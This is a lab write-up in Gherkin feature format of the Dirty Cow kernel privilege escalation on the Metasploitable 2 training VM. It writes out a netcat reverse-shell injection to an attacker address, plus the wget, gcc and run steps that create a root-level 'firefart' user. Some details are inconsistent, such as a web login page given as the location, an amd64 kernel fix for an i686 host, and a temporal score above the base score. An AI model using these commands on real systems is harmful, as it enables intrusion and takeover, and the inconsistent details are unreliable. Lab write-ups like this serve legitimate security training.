## Version 1.4.1
## language: en

Feature: Dirty Cow
  TOE:
    Metasploitable 2
  Category:
    Kernel exploits
  Location:
    http://localhost/dvwa/login.php
  CWE:
    CWE-366: Race Condition within a Thread
  Rule:
    REQ.186: https://fluidattacks.com/web/rules/186/
  Goal:
    Gain elevated access
  Recommendation:
    Upgrade the kernel version

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | netcat          | v1.10-41.1  |
    | python          | 2.7.16      |
    | wget            | 1.20.1      |
  TOE information:
    Given A OS command injection vulnerability
    When I inject a command in order to create netcat reverse shell
    """
    ; nc 192.168.0.13 1234 -e /bin/bash
    """
    Then I get a shell for the user "www-data" [evidence](image1.png)

  Scenario: Normal use case
    Given The reverse shell
    When I try to run a privileged command
    Then I get an error
    """
    cat: /etc/shadow: Permission denied
    """
    And I dont have admin access

  Scenario: Static detection
    Given The reverse shell
    When I run the command "uname -a"
    Then I get the kernel version which is "2.6.24-16"
    """
    Linux metasploitable 2.6.24-16-server #1 SMP
    Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    """
    When I search on the internet for that version
    Then I find that the kernel is affected since version "2.6.22"
    And The computer is vulnerable to the dirty cow exploit

  Scenario: Dynamic detection
    Given The file at "https://www.exploit-db.com/exploits/40839"
    When I download the file and compile it following the instruction
    Then I run the executable
    And It works

  Scenario: Exploitation
    Given The reverse shell
    When I download the exploit that is hosted in "exploit-db.com"
    """
    wget https://www.exploit-db.com/download/40839 -O dirty.c
    """
    Then I have the file "dirty.c" in the atacker machine
    When I open a local server with python in the atacker machine
    """
    python -m SimpleHTTPServer 8888
    """
    Then I can download the "dirty.c" file in the server [evidence](image2.png)
    When I read on the exploit's page how to compile it
    Then I try to compile it with the "gcc" command
    """
    gcc -pthread dirty.c -o dirty -lcrypt
    """
    And I have an exeuctable file called "dirty"
    When I run the file in the server
    """
    ./dirty password
    """
    Then I have a user with the username "firefart" and the password "password"
    And I am an admin user [evidence](image3.png)

  Scenario: Remediation
    Given The vulnerability
    When  I update the kernel to a newer version
    """
    apt-get install linux-image-3.2.0-4-amd64
    """
    Then I have a no exploitable version
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.8/10 (High) - AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      9.1/10 (Critical) - E:F/RL:O/RC:C
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-09
